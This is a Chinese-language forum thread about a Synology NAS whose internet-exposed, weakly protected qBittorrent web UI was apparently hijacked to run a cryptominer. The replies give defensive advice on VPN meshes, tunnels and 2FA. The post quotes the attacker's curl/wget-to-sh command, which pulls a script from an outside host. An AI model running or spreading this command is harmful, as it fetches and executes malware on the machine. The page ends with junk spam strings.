记一次群晖开 qbittorrent 被植入挖矿代码 - V2EX
首页 注册 登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
请不要把任何和邀请码有关的内容发到 NAS 节点。

邀请码相关的内容请使用 /go/in 节点。

如果没有发送到 /go/in,那么会被移动到 /go/pointless 同时账号会被降权。如果持续触发这样的移动,会导致账号被禁用。
hiyoi
V2EX    NAS

记一次群晖开 qbittorrent 被植入挖矿代码

  •   
  •   hiyoi 204 天前 3453 次点击
    这是一个创建于 204 天前的主题,其中的信息可能已经有所发展或是发生改变。
    起因:
    偶然发现群晖 cpu 内存占用率很高。

    查看进程发现有个进程以 qbittornet 用户运行这一个 名叫./PHsyYPRT 进程,名字很古怪,占了 2 核 cpu ,30%内存。

    起初怀疑是 qbit 问题,马上停止套件,进程消失。 但是又过了几天,又发现相同的进程。 一顿搜索

    参考:
    https://www.reddit.com/r/synology/comments/1co3toi/rogue_process_eating_ram/?tl=zh-hans

    发现攻击者可以在 web ui, 设置 torrent 下载完成时执行外部程序:
    sh -c "(curl -sk https://fulminare.top || wget --no-check-certificate -qO - https://fulminare.top) | sh"

    考虑到之前 web ui 曾开到公网过,且用了弱密码。被轻易爆破的可能性很大。

    赶紧把 web ui 公网关掉。
  • 挖矿
  • qbit
  • webui
    22 条回复    2025-06-11 23:38:07 +08:00
    ererrrr
        1
    ererrrr  
       204 天前
    要用组网呀
    guanzhangzhang
        2
    guanzhangzhang  
       204 天前
    异地组成局域网,就没这么多事情了,三层都是通的,而不是映射端口啥的
    needhourger
        3
    needhourger  
       204 天前   5
    弱密码公开到公网啊,那没事了
    justNoBody
        4
    justNoBody  
       204 天前
    谢谢分享
    vpsvps
        5
    vpsvps  
       204 天前
    qbittorrent 套件源有问题吧
    bao3
        6
    bao3  
       204 天前
    tailscale ,headscale ,wireguard 等等,大家讨论异地组网就是为了家庭服务不用公网公开。
    yazinnnn0
        7
    yazinnnn0  
       204 天前
    用 ssh -L 4000:127.0.0.1:4000 之类的办法把端口转发到本机啊... 随便一个应用就放公网太危险了
    hiyoi
        8
    hiyoi  
    OP
       204 天前 via Android
    @vpsvps 应该不是,用的矿神群晖 spk 源下的 qbit 套件版,如果有问题应该早就爆出来了
    hiyoi
        9
    hiyoi  
    OP
       204 天前 via Android   1
    再不敢轻易放服务到公网了
    JensenQian
        10
    JensenQian  
       204 天前
    JensenQian
        11
    JensenQian  
       204 天前
    xiaozhubin
        12
    xiaozhubin  
       203 天前
    之前群晖安了个 qb, 也是映射外网了,有次突然发现下载列表里出现了一个我从未下载过的资源,就把外网关了,现在只在内网用了。
    hiyoi
        13
    hiyoi  
    OP
       203 天前 via Android
    @xiaozhubin 对公的服务最好是带 2FA 的。我还开着一个 vaultwarden ,开着 2FA ,一直稳定运行。
    montaro2017
        14
    montaro2017  
       203 天前
    @JensenQian #11 真能搜到啊
    okzy520
        15
    okzy520  
       203 天前 via iPhone
    我也是发现 qbit 认证太简单了 就把外网给关了
    之后就用 zerotier 了 个人自建的要是不支持 2FA 最好别往外放
    pcloves
        16
    pcloves  
       203 天前
    @hiyoi 话说这个 qbit 怎么开 2FA 啊?
    anjing01
        17
    anjing01  
       203 天前
    前面加个 APACHE/NGINX ,配置个 BasicAuth 认证+限制国外 IP 访问(甚至只允许你所在省份 IP 访问)+ 访问日志 403 的 IP 地址 ipset 加入 blocklist ,基本上没啥问题(服务器带外需要 WEB 放出来);
    WG 也用,不过那个主要是给外部访问 SAMBA 共享、远程桌面用的;
    obeykarma
        18
    obeykarma  
       202 天前
    我套了 HTTPS 直接对公网,改了用户名和密码

    应该没什么安全隐患,最多扫端口发现我在用 qb 了
    hiyoi
        19
    hiyoi  
    OP
       202 天前 via Android
    @obeykarma 用强密码就没事
    okzy520
        20
    okzy520  
       202 天前
    @pcloves qbit 就没这个能力 别想了
    官方论坛上有个帖子解释的 大意什么服务能开放到什么程序是有条件的 用户应该自己评估
    不过 qbit 自己的做法已经是在变相告诉你 仅限内网使用了
    starrys
        21
    starrys  
       201 天前
    @hiyoi #19 真是带不动你。楼上那么多人说要组网、防火墙控制,感觉你都没听进去,仍然觉得设置 2FA 、强密码就可以了,这样虽然安全程度有所提升,但还不够的,原因是“应用程序可能存在未知的漏洞导致你的主机被攻破”。
    hiyoi
        22
    hiyoi  
    OP
       201 天前 via Android
    @starrys 你要这么说,那就没有什么应用程序是绝对的安全。 强密码+2FA 是现在公认的比较安全的方案。

    btw ,我已经把 qbit web ui 端口转发公网关了。
    关于     帮助文档     自助推广系统     博客     API     FAQ     Solana     3018 人在线   最高记录 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 27ms UTC 12:45 PVG 20:45 LAX 04:45 JFK 07:45
    Do have faith in what you're doing.
    ubao msn snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86